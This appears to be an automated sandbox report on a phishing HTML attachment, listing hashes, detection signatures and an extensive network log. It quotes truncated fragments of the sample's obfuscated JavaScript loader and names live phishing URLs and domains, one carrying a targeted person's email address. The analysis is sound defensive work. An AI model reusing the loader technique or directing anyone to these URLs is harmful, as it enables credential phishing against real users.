Windows Analysis Report
Remittance_Raveis.htm

Overview

General Information

Sample name: Remittance_Raveis.htm
Analysis ID: 1529041
MD5: fbbe44fc8f8c9af2ba3659fbcb2f3c4b
SHA1: df7e42d4023493054844731e4c023cabd0fe1fde
SHA256: d05473dd6100cb5d88bae011c8df667799d7722c9b64ad550de1ab99d4227abd

Detection

Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

HTML file submission requesting Cloudflare captcha challenge
HTML document with suspicious name
HTML document with suspicious title
Phishing site detected (based on shot match)
Connects to many different domains
Detected non-DNS traffic on DNS port
HTML page contains hidden javascript code
HTML page contains string obfuscation
Stores files to the Windows start menu directory
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

Phishing

barindex
Source: file:///C:/Users/user/Desktop/Remittance_Raveis.htm Tab title: Remittance_Raveis.htm
Source: https://k5f9z1.tingbonteri.com/6IC48/#C#Mbwebb@raveis.com Matcher: Template: captcha matched
Source: https://k5f9z1.tingbonteri.com/6IC48/#C#Mbwebb@raveis.com Matcher: Template: captcha matched
Source: https://k5f9z1.tingbonteri.com/6IC48/#C#Mbwebb@raveis.com HTTP Parser: Base64 decoded: {"version":3,"sources":["/cfsetup_build/src/orchestrator/turnstile/templates/turnstile.scss","%3Cinput%20css%20qtFLbZ%3E"],"names":[],"mappings":"AAmCA,gBACI,GACI,uBClCN,CACF,CDqCA,kBACI,GACI,mBCnCN,CACF,CDsCA,iBACI,MAEI,cCrCN,CDwCE,IACI,mBCtCN,CACF,CDyCA...
Source: file:///C:/Users/user/Desktop/Remittance_Raveis.htm HTTP Parser: Found new string: script document[zircon]( quetzalcoatlus + anemone + '></sc' + 'ript>') /* vole */ ;...
Source: https://web10.pro/res444.php?2-68747470733a2f2f6b3566397a312e74696e67626f6e746572692e636f6d2f36494334382f-koel HTTP Parser: var hcriijzkiobojqbc = document.createelement("script");hcriijzkiobojqbc.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(hcriijzkiobojqbc);hcriijzkiobojqbc.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoiytnzaw9tum42cdz6oxrbtjzmsxc3tuc0z0kxavwvvhn5cxr5xc81nctqsvhezxffmmflrklza0tybejvt2fos2l5cluxnzyybelmttrvvmjvanlzwvzxcxqxsfv5wg1swmwxwdfsbfblylfkdxfjyjb2dmw5njddcmrdce1jz3fjswrinmdlrhftsw9uoxrxyldwvddidue2utjeqxp6thdytvpmchprc0pptlhkmwzauwxuuuxmddnuu1zadjhezxbxajmwwefxcnkxsvluvu01mmkyd21hqnfrt3liazhnrtbxdgqyvgndmnrxn09pvuxxchlhenpsmgnevitobmnnswnxehfewgjjwkzbagf3s21crke0andnbvqrcwf0s3f0u1z1rldvcutjbljzbxdiuljvou03nmvtz2frqkpjrjjryug3ww9auhk3uwv6qmrhdtvmtndvythxmxpjqlpcl3dhr2zpauvoa3pnqtdvsghxwxarmml3qkrxdll1d2n0tmdtdfbetuwrufy2rhcrzdngq01fnme0bxrpszjktmrgeutlz0hcmzrwykoxcjv2wjnsetrxcwf5a0vqvecyshfmvwnqag9wymrtrdvkzmr3sdzfrdl6sedxeutstjr4udvzqjnssnozv05qavdkcuzgwm1rdhdxemrvodcrmdvrqwe5z1l3whlfrlzinfd3mmjprdlku1hjsg56ne5uyn...
Source: Remittance_Raveis.htm HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Remittance_Raveis.htm HTTP Parser: No favicon
Source: https://k5f9z1.tingbonteri.com/6IC48/#C#Mbwebb@raveis.com HTTP Parser: No favicon
Source: https://www.made-in-china.com/ HTTP Parser: No favicon
Source: https://www.made-in-china.com/ HTTP Parser: No favicon
Source: https://www.made-in-china.com/ HTTP Parser: No favicon
Source: https://www.made-in-china.com/ HTTP Parser: No favicon
Source: https://www.made-in-china.com/ HTTP Parser: No favicon
Source: https://www.made-in-china.com/ HTTP Parser: No favicon
Source: https://www.made-in-china.com/ HTTP Parser: No favicon
Source: https://www.made-in-china.com/ HTTP Parser: No favicon
Source: https://www.made-in-china.com/ HTTP Parser: No favicon
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.165.164.15:443 -> 192.168.2.16:64825 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:64830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:64840 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:64860 version: TLS 1.2
Source: chrome.exe Memory has grown: Private usage: 1MB later: 31MB
Source: unknown Network traffic detected: DNS query count 33
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: global traffic TCP traffic: 192.168.2.16:49719 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:64823 -> 162.159.36.2:53
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: web10.pro
Source: global traffic DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: k5f9z1.tingbonteri.com
Source: global traffic DNS traffic detected: DNS query: code.jquery.com
Source: global traffic DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: xoiaa5zz7ijzc3p6xoocpvbctfpd2bg8j7krpd7hksops0jy4lg0vtmplq.gnovesonc.ru
Source: global traffic DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: global traffic DNS traffic detected: DNS query: made-in-china.com
Source: global traffic DNS traffic detected: DNS query: 56.163.245.4.in-addr.arpa
Source: global traffic DNS traffic detected: DNS query: www.made-in-china.com
Source: global traffic DNS traffic detected: DNS query: www.micstatic.com
Source: global traffic DNS traffic detected: DNS query: image.made-in-china.com
Source: global traffic DNS traffic detected: DNS query: pic.made-in-china.com
Source: global traffic DNS traffic detected: DNS query: static.cloudflareinsights.com
Source: global traffic DNS traffic detected: DNS query: discovery.micstatic.com
Source: global traffic DNS traffic detected: DNS query: fa.micstatic.com
Source: global traffic DNS traffic detected: DNS query: widget.usersnap.com
Source: global traffic DNS traffic detected: DNS query: resources.usersnap.com
Source: global traffic DNS traffic detected: DNS query: membercenter.made-in-china.com
Source: global traffic DNS traffic detected: DNS query: webim.trademessenger.com
Source: global traffic DNS traffic detected: DNS query: webim.made-in-china.com
Source: global traffic DNS traffic detected: DNS query: connect.facebook.net
Source: global traffic DNS traffic detected: DNS query: tags.creativecdn.com
Source: global traffic DNS traffic detected: DNS query: asia.creativecdn.com
Source: global traffic DNS traffic detected: DNS query: td.doubleclick.net
Source: global traffic DNS traffic detected: DNS query: googleads.g.doubleclick.net
Source: global traffic DNS traffic detected: DNS query: analytics.google.com
Source: global traffic DNS traffic detected: DNS query: stats.g.doubleclick.net
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: ib.adnxs.com
Source: global traffic DNS traffic detected: DNS query: f.creativecdn.com
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 65019 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64943 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 65002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 65031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 64828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 65014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 65008 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 64972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 65036 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 65007 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64973 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 65024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 65030 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 64840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 65013 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64995 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 65035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64971 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65069
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 65018 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64982 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 65001 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 65029 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 65017 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64983 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 65023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 65000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 65006 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 65034 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 64999 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65030
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65033
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65034
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65031
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65032
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 65028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64970
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65026
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64972
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65024
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64971
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64973
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65028
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65029
Source: unknown Network traffic detected: HTTP traffic on port 64831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 65022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64986 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64860
Source: unknown Network traffic detected: HTTP traffic on port 64825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64983
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65035
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64861
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64982
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65036
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64985
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64986
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64999
Source: unknown Network traffic detected: HTTP traffic on port 65222 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64992
Source: unknown Network traffic detected: HTTP traffic on port 64826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64991
Source: unknown Network traffic detected: HTTP traffic on port 65033 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64996
Source: unknown Network traffic detected: HTTP traffic on port 64860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64992 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 64995
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 65016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 65069 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64970 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64848 -> 443
